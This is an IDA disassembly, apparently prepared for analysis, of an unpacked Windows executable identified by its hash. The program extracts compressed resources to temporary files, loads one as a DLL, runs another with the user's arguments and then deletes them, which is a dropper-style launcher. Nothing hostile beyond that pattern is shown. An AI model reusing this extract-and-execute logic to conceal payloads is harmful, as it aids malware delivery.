;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 1FBF24B09DB5E3E53A512F152119A16E
; File Name : u:\work\1fbf24b09db5e3e53a512f152119a16e_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000740 ( 1856.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; LPSTR __stdcall lstrcatA(LPSTR lpString1,LPCSTR lpString2)
extrn lstrcatA:dword ; CODE XREF: sub_40122B+13B�p
; sub_40122B+149�p ...
; HGLOBAL __stdcall LoadResource(HMODULE hModule,HRSRC hResInfo)
extrn LoadResource:dword ; CODE XREF: sub_4010EE+2B�p
; DATA XREF: sub_4010EE+2B�r
; DWORD __stdcall SizeofResource(HMODULE hModule,HRSRC hResInfo)
extrn SizeofResource:dword ; CODE XREF: sub_4010EE+1C�p
; DATA XREF: sub_4010EE+1C�r
; HRSRC __stdcall FindResourceA(HMODULE hModule,LPCSTR lpName,LPCSTR lpType)
extrn FindResourceA:dword ; CODE XREF: sub_4010EE+B�p
; DATA XREF: sub_4010EE+B�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_401128+46�p
; sub_40122B+199�p ...
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_401128+36�p
; DATA XREF: sub_401128+36�r
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_401128+19�p
; DATA XREF: sub_401128+19�r
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName,LPCSTR lpPrefixString,UINT uUnique,LPSTR lpTempFileName)
extrn GetTempFileNameA:dword ; CODE XREF: sub_40117E+F�p
; DATA XREF: sub_40117E+F�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_401194+8A�p
; sub_40122B+CB�p ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_40122B+1C6�p
; DATA XREF: sub_40122B+1C6�r
; BOOL __stdcall GetExitCodeProcess(HANDLE hProcess,LPDWORD lpExitCode)
extrn GetExitCodeProcess:dword ; CODE XREF: sub_40122B+1AC�p
; DATA XREF: sub_40122B+1AC�r
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle,DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_40122B+1A0�p
; DATA XREF: sub_40122B+1A0�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_40122B+179�p
; DATA XREF: sub_40122B+179�r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: sub_40122B+159�p
; DATA XREF: sub_40122B+159�r
; LPVOID __stdcall LockResource(HGLOBAL hResData)
extrn LockResource:dword ; CODE XREF: sub_4010EE+32�p
; DATA XREF: sub_4010EE+32�r
; LPSTR __stdcall lstrcpyA(LPSTR lpString1,LPCSTR lpString2)
extrn lstrcpyA:dword ; CODE XREF: sub_40122B+121�p
; DATA XREF: sub_40122B+121�r
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: sub_40122B:loc_40131B�p
; DATA XREF: sub_40122B:loc_40131B�r
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_40122B+BE�p
; sub_40122B+E1�p
; DATA XREF: ...
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_40122B+70�p
; DATA XREF: sub_40122B+70�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_40122B+5A�p
; DATA XREF: sub_40122B+5A�r
; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer,UINT uSize)
extrn GetWindowsDirectoryA:dword ; CODE XREF: start+65�p
; DATA XREF: start+65�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: start+19�p
; DATA XREF: start+19�r
;
; Imports from LZ32.dll
;
; LONG __stdcall LZCopy(INT,INT)
extrn __imp_LZCopy:dword ; DATA XREF: LZCopy�r
; INT __stdcall LZOpenFileA(LPSTR,LPOFSTRUCT,WORD)
extrn __imp_LZOpenFileA:dword ; DATA XREF: LZOpenFileA�r
; void __stdcall LZClose(INT)
extrn __imp_LZClose:dword ; DATA XREF: LZClose�r
;
; Imports from USER32.dll
;
; int __stdcall MessageBoxA(HWND hWnd,LPCSTR lpText,LPCSTR lpCaption,UINT uType)
extrn MessageBoxA:dword ; CODE XREF: start+98�p
; DATA XREF: start+98�r
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401074h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; char PrefixString[]
PrefixString db 'sxe',0 ; DATA XREF: sub_40117E+6�o
; char asc_401078[]
asc_401078 db '" ',0 ; DATA XREF: sub_40122B+143�o
align 4
; char String2[]
String2 db '"',0 ; DATA XREF: sub_40122B+11B�o
align 10h
; char ProcName[]
ProcName db 'DllInflate',0 ; DATA XREF: sub_40122B+6A�o
align 4
; char Text[]
Text db 'An error has occured while executing this program. Free up harddr'
; DATA XREF: start+91�o
db 'ive space and try again.',0
align 4
; char Caption[]
Caption db 'Error',0 ; DATA XREF: start+8C�o
; =============== S U B R O U T I N E =======================================
sub_4010EE proc near ; CODE XREF: sub_40122B+19�p
; sub_40122B+82�p
arg_0 = word ptr 4
arg_4 = dword ptr 8
movzx eax, [esp+arg_0]
push esi
push 63h ; lpType
push eax ; lpName
push 0 ; hModule
call FindResourceA ; FindResourceA
mov esi, eax
test esi, esi
jnz short loc_401107
pop esi
retn
; ---------------------------------------------------------------------------
loc_401107: ; CODE XREF: sub_4010EE+15�j
push esi ; hResInfo
push 0 ; hModule
call SizeofResource ; SizeofResource
mov ecx, [esp+4+arg_4]
push esi ; hResInfo
push 0 ; hModule
mov [ecx], eax
call LoadResource ; LoadResource
push eax ; hResData
call LockResource ; LockResource
pop esi
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401128(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPCSTR NumberOfBytesWritten)
sub_401128 proc near ; CODE XREF: sub_401194+27�p
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
NumberOfBytesWritten= dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
push edi
push esi ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push esi ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+NumberOfBytesWritten] ; lpFileName
call CreateFileA ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_401178
mov [ebp+NumberOfBytesWritten], esi
push esi ; lpOverlapped
mov esi, [ebp+nNumberOfBytesToWrite]
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push esi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push edi ; hFile
call WriteFile ; WriteFile
test eax, eax
jz short loc_401178
cmp esi, [ebp+NumberOfBytesWritten]
jnz short loc_401178
push edi ; hObject
call CloseHandle ; CloseHandle
mov al, 1
jmp short loc_40117A
; ---------------------------------------------------------------------------
loc_401178: ; CODE XREF: sub_401128+24�j
; sub_401128+3E�j ...
xor al, al
loc_40117A: ; CODE XREF: sub_401128+4E�j
pop edi
pop esi
pop ebp
retn
sub_401128 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40117E(LPCSTR lpPathName,LPSTR lpTempFileName)
sub_40117E proc near ; CODE XREF: sub_401194+15�p
; sub_40122B+30�p ...
lpPathName = dword ptr 4
lpTempFileName = dword ptr 8
push [esp+lpTempFileName] ; lpTempFileName
push 0 ; uUnique
push offset PrefixString ; "sxe"
push [esp+0Ch+lpPathName] ; lpPathName
call GetTempFileNameA ; GetTempFileNameA
retn
sub_40117E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401194(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPCSTR lpPathName,LPSTR)
sub_401194 proc near ; CODE XREF: sub_40122B+43�p
; sub_40122B+AC�p
; DATA XREF: ...
var_18C = _OFSTRUCT ptr -18Ch
FileName = byte ptr -104h
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
lpPathName = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18Ch
push esi
lea eax, [ebp+FileName]
push edi
push eax ; lpTempFileName
push [ebp+lpPathName] ; lpPathName
call sub_40117E
lea eax, [ebp+FileName]
push eax ; NumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
call sub_401128
add esp, 14h
test al, al
jz short loc_401207
lea eax, [ebp+var_18C]
push 0 ; WORD
push eax ; LPOFSTRUCT
lea eax, [ebp+FileName]
push eax ; LPSTR
call LZOpenFileA ; LZOpenFileA
mov edi, eax
test edi, edi
jl short loc_401207
lea eax, [ebp+var_18C]
push 1002h ; WORD
push eax ; LPOFSTRUCT
push [ebp+arg_C] ; LPSTR
call LZOpenFileA ; LZOpenFileA
mov esi, eax
test esi, esi
jl short loc_401207
push esi ; INT
push edi ; INT
call LZCopy ; LZCopy
test eax, eax
jge short loc_40120B
loc_401207: ; CODE XREF: sub_401194+31�j
; sub_401194+4C�j ...
xor eax, eax
jmp short loc_401227
; ---------------------------------------------------------------------------
loc_40120B: ; CODE XREF: sub_401194+71�j
push edi ; INT
call LZClose ; LZClose
push esi ; INT
call LZClose ; LZClose
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
push 1
pop eax
loc_401227: ; CODE XREF: sub_401194+75�j
pop edi
pop esi
leave
retn
sub_401194 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40122B(LPCSTR lpPathName,LPDWORD lpExitCode)
sub_40122B proc near ; CODE XREF: start+52�p start+7A�p
String2 = byte ptr -364h
TempFileName = byte ptr -260h
CommandLine = byte ptr -15Ch
StartupInfo = _STARTUPINFOA ptr -58h
hObject = _PROCESS_INFORMATION ptr -14h
nNumberOfBytesToWrite= dword ptr -4
lpPathName = dword ptr 8
lpExitCode = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 364h
push ebx
push esi
lea eax, [ebp+nNumberOfBytesToWrite]
push edi
push eax
push 1
xor esi, esi
mov ebx, offset sub_401194
call sub_4010EE
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4012A7
lea eax, [ebp+TempFileName]
push eax ; lpTempFileName
push [ebp+lpPathName] ; lpPathName
call sub_40117E
lea eax, [ebp+TempFileName]
push eax ; LPSTR
push [ebp+lpPathName] ; lpPathName
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push edi ; lpBuffer
call sub_401194
add esp, 18h
test eax, eax
jz loc_4013B7
lea eax, [ebp+TempFileName]
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov esi, eax
test esi, esi
jz loc_4013B7
push offset ProcName ; "DllInflate"
push esi ; hModule
call GetProcAddress ; GetProcAddress
mov ebx, eax
test ebx, ebx
jz short loc_4012E0
loc_4012A7: ; CODE XREF: sub_40122B+24�j
lea eax, [ebp+nNumberOfBytesToWrite]
push eax
push 2
call sub_4010EE
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4012E0
lea eax, [ebp+String2]
push eax ; lpTempFileName
push [ebp+lpPathName] ; lpPathName
call sub_40117E
lea eax, [ebp+String2]
push eax ; LPSTR
push [ebp+lpPathName] ; lpPathName
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push edi ; lpBuffer
call ebx ; sub_401194
add esp, 18h
test eax, eax
jnz short loc_401301
loc_4012E0: ; CODE XREF: sub_40122B+7A�j
; sub_40122B+8D�j
test esi, esi
jz loc_4013B7
push esi ; hLibModule
call FreeLibrary ; FreeLibrary
lea eax, [ebp+TempFileName]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
jmp loc_4013B7
; ---------------------------------------------------------------------------
loc_401301: ; CODE XREF: sub_40122B+B3�j
mov ebx, DeleteFileA
test esi, esi
jz short loc_40131B
push esi ; hLibModule
call FreeLibrary ; FreeLibrary
lea eax, [ebp+TempFileName]
push eax ; lpFileName
call ebx ; DeleteFileA
loc_40131B: ; CODE XREF: sub_40122B+DE�j
call GetCommandLineA ; GetCommandLineA
mov edi, eax
xor cl, cl
cmp byte ptr [edi], 22h
jnz short loc_40132D
inc cl
loc_40132C: ; CODE XREF: sub_40122B+112�j
inc edi
loc_40132D: ; CODE XREF: sub_40122B+FD�j
mov al, [edi]
test al, al
jz short loc_401340
cmp al, 20h
jnz short loc_40133B
test cl, cl
jz short loc_401340
loc_40133B: ; CODE XREF: sub_40122B+10A�j
cmp al, 22h
jnz short loc_40132C
inc edi
loc_401340: ; CODE XREF: sub_40122B+106�j
; sub_40122B+10E�j
lea eax, [ebp+CommandLine]
push offset String2 ; "\""
push eax ; lpString1
call lstrcpyA ; lstrcpyA
mov esi, lstrcatA
lea eax, [ebp+String2]
push eax ; lpString2
lea eax, [ebp+CommandLine]
push eax ; lpString1
call esi ; lstrcatA
lea eax, [ebp+CommandLine]
push offset asc_401078 ; "\" "
push eax ; lpString1
call esi ; lstrcatA
lea eax, [ebp+CommandLine]
push edi ; lpString2
push eax ; lpString1
call esi ; lstrcatA
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
call GetStartupInfoA ; GetStartupInfoA
lea eax, [ebp+hObject]
xor edi, edi
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push edi ; lpCurrentDirectory
push edi ; lpEnvironment
push 20h ; dwCreationFlags
push 1 ; bInheritHandles
push edi ; lpThreadAttributes
lea eax, [ebp+CommandLine]
push edi ; lpProcessAttributes
push eax ; lpCommandLine
push edi ; lpApplicationName
call CreateProcessA ; CreateProcessA
test eax, eax
jnz short loc_4013BB
lea eax, [ebp+String2]
push eax ; lpFileName
call ebx ; DeleteFileA
loc_4013B7: ; CODE XREF: sub_40122B+4D�j
; sub_40122B+64�j ...
xor al, al
jmp short loc_4013FF
; ---------------------------------------------------------------------------
loc_4013BB: ; CODE XREF: sub_40122B+181�j
push [ebp+hObject.hThread] ; hObject
mov esi, CloseHandle
call esi ; CloseHandle
push 0FFFFFFFFh ; dwMilliseconds
push [ebp+hObject.hProcess] ; hHandle
call WaitForSingleObject ; WaitForSingleObject
push [ebp+lpExitCode] ; lpExitCode
push [ebp+hObject.hProcess] ; hProcess
call GetExitCodeProcess ; GetExitCodeProcess
push [ebp+hObject.hProcess] ; hObject
call esi ; CloseHandle
loc_4013E2: ; CODE XREF: sub_40122B+1D0�j
lea eax, [ebp+String2]
push eax ; lpFileName
call ebx ; DeleteFileA
test eax, eax
jnz short loc_4013FD
push 64h ; dwMilliseconds
call Sleep ; Sleep
inc edi
cmp edi, 64h
jl short loc_4013E2
loc_4013FD: ; CODE XREF: sub_40122B+1C2�j
mov al, 1
loc_4013FF: ; CODE XREF: sub_40122B+18E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40122B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
Buffer = byte ptr -20Ch
PathName = byte ptr -108h
ExitCode = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20Ch
push esi
mov esi, 104h
lea eax, [ebp+PathName]
push esi ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
mov cl, [ebp+PathName]
xor edx, edx
test cl, cl
lea eax, [ebp+PathName]
jz short loc_40144B
loc_401435: ; CODE XREF: start+3F�j
cmp cl, 5Ch
jnz short loc_40143D
lea edx, [eax+1]
loc_40143D: ; CODE XREF: start+34�j
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_401435
test edx, edx
jz short loc_40144B
and [edx], cl
loc_40144B: ; CODE XREF: start+2F�j start+43�j
lea eax, [ebp+ExitCode]
push eax ; lpExitCode
lea eax, [ebp+PathName]
push eax ; lpPathName
call sub_40122B
pop ecx
test al, al
pop ecx
jnz short loc_401489
lea eax, [ebp+Buffer]
push esi ; uSize
push eax ; lpBuffer
call GetWindowsDirectoryA ; GetWindowsDirectoryA
test eax, eax
jz short loc_40148E
lea eax, [ebp+ExitCode]
push eax ; lpExitCode
lea eax, [ebp+Buffer]
push eax ; lpPathName
call sub_40122B
pop ecx
test al, al
pop ecx
jz short loc_40148E
loc_401489: ; CODE XREF: start+5B�j
mov eax, [ebp+ExitCode]
jmp short loc_4014A5
; ---------------------------------------------------------------------------
loc_40148E: ; CODE XREF: start+6D�j start+83�j
push 0 ; uType
push offset Caption ; "Error"
push offset Text ; "An error has occured while executing th"...
push 0 ; hWnd
call MessageBoxA ; MessageBoxA
or eax, 0FFFFFFFFh
loc_4014A5: ; CODE XREF: start+88�j
pop esi
leave
retn
start endp
; [00000006 BYTES: COLLAPSED FUNCTION LZClose. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LZCopy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LZOpenFileA. PRESS KEYPAD "+" TO EXPAND]
align 4
dd 150Ch, 2 dup(0)
dd 16ECh, 1000h, 1568h, 2 dup(0)
dd 171Ch, 105Ch, 1578h, 2 dup(0)
dd 1734h, 106Ch, 5 dup(0)
dd 1664h, 1590h, 15A0h, 15B2h, 15C2h, 15D0h, 15DCh, 15EAh
dd 15FEh, 160Ch, 1614h, 162Ah, 1640h, 1652h, 1580h, 1670h
dd 167Ch, 168Eh, 169Ch, 16AEh, 16BEh, 16D6h, 0
dd 1704h, 170Eh, 16FAh, 0
dd 1726h, 0
db 0D5h ; Õ
db 1, 4Ch, 6Fh
aCkresource db 'ckResource',0
align 10h
db 0C7h ; Ç
db 1, 4Ch, 6Fh
aAdresource db 'adResource',0
align 10h
db 95h ; •
db 2, 53h, 69h
aZeofresource db 'zeofResource',0
align 2
aG db '£',0
aFindresourcea db 'FindResourceA',0
db 1Bh,0
aClosehandle db 'CloseHandle',0
db 0DFh ; ß
db 2, 57h, 72h
aItefile db 'iteFile',0
a4 db '4',0
aCreatefilea db 'CreateFileA',0
dw 163h
aGettempfilenam db 'GetTempFileNameA',0
align 2
aW db 'W',0
aDeletefilea db 'DeleteFileA',0
db 96h ; –
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0Bh
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 2CEh
aWaitforsingleo db 'WaitForSingleObject',0
aD db 'D',0
aCreateprocessa db 'CreateProcessA',0
align 2
dw 150h
aGetstartupinfo db 'GetStartupInfoA',0
dd 736C02F9h, 61637274h, 4174h, 736C0302h, 70637274h, 4179h
dd 654700CAh, 6D6F4374h, 646E616Dh, 656E694Ch, 0B40041h
dd 65657246h, 7262694Ch, 797261h, 6547013Eh, 6F725074h
dd 64644163h, 73736572h, 1C20000h, 64616F4Ch, 7262694Ch
dd 41797261h, 17D0000h
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 2
dw 124h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
aKernel32_dll db 'KERNEL32.dll',0
align 2
dw 3
aLzclose db 'LZClose',0
dd 5A4C0004h, 79706F43h, 70000h, 704F5A4Ch, 69466E65h
dd 41656Ch, 32335A4Ch, 6C6C642Eh, 1BE0000h, 7373654Dh
dd 42656761h, 41786Fh, 52455355h, 642E3233h, 6C6Ch, 30h dup(0)
_text ends
end start